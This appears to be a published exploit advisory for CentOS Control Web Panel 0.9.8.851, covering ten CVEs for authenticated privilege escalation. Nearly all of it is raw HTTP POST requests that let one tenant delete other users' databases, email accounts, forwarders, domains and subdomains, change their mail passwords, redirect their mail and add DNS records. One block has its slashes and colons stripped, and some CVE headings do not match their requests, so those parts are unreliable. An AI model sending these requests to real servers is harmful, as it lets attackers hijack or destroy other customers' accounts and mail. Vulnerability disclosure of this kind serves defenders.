Control Web Panel 0.9.8.851 Privilege Escalation

Control Web Panel version 0.9.8.851 suffers from multiple privilege escalation vulnerabilities.


MD5 | 6f60d66e3e8d2b75a2b81b0d30d6bc25

CVE Number      : CVE-2019-14721, CVE-2019-14722, CVE-2019-14723, CVE-2019-14724, CVE-2019-14725, CVE-2019-14726, CVE-2019-14727, CVE-2019-14728, CVE-2019-14729, CVE-2019-14730

Date : 24 Jul 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for lastest version
Product Name : CWP (CentOS Control Web Panel)
Version : 0.9.8.851
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
Reference : https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE
Attack Requirement : Authenticated User

-------------------------------------------------------------------------------------------------------------
CVE-2019-14721 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=mysql_manager&acc=deleteuserdb HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 31
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=mysql_manager
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

user=<TARGET-USER>&host=localhost

-------------------------------------------------------------------------------------------------------------
CVE-2019-14722 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other mail forwarder
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=forwardelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 7
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14723 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other email account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=emaildelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 21
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14724 : CWP (CentOS Control Web Panel 0.9.8.851) Access Other DNS and Delete
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updateforwarders HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 14
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

[email protected]&[email protected]

-------------------------------------------------------------------------------------------------------------
CVE-2019-14725 : CWP (CentOS Control Web Panel 0.9.8.851) Remove user from phpMyAdmin via an attacker account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=updquotaemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&quota=1048576000

-------------------------------------------------------------------------------------------------------------
CVE-2019-14726 : CWP (CentOS Control Web Panel 0.9.8.851) Modify forward mail destination on victim's account
-------------------------------------------------------------------------------------------------------------

# Access

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=paserrecord HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 16
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com

-------------------------------------------------------------------------------

# Delete

POST cwp_b99b38b4d4ced310alicealiceindex.phpmodule=dns_zone_editor&acc=addregdns HTTP1.1
Host 192.168.80.1482083
User-Agent Mozilla5.0 (Windows NT 10.0; Win64; x64; rv68.0) Gecko20100101 Firefox68.0
Accept
Accept-Language en-US,en;q=0.5
Accept-Encoding gzip, deflate
Content-Type applicationx-www-form-urlencoded; charset=UTF-8
csrftoken 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With XMLHttpRequest
Content-Length 111
Connection close
Referer https192.168.80.1482083cwp_b99b38b4d4ced310alicemodule=dns_zone_editor
Cookie PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400&reg=A&flag=undefined&tag=undefined

-------------------------------------------------------------------------------------------------------------
CVE-2019-14727 : CWP (CentOS Control Web Panel 0.9.8.851) Change other email password
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=changpassemail HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 45
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

email=<TARGET-EMAIL>&[email protected]

-------------------------------------------------------------------------------------------------------------
CVE-2019-14728 : CWP (CentOS Control Web Panel 0.9.8.851) Add forward mail to other account
-------------------------------------------------------------------------------------------------------------

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=email_accounts&acc=addforwar HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=email_accounts
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

forwaraddres=bob2&domainforwar=bob2&[email protected]

-------------------------------------------------------------------------------------------------------------
CVE-2019-14729 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other sub-domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=subdomains&acc=subdomaindelete HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 32
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=subdomains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>&subdomain=<TARGET-SUBDOMAIN>

-------------------------------------------------------------------------------------------------------------
CVE-2019-14730 : CWP (CentOS Control Web Panel 0.9.8.851) Delete other domain
-------------------------------------------------------------------------------------------------------------

POST /cwp_47e1d536a096e42d/alice/alice/index.php?module=domains&acc=verifsubdomain HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 12
Connection: close
Referer: https://192.168.80.148:2083/cwp_47e1d536a096e42d/alice/?module=domains
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=<TARGET-DOMAIN>

Related Posts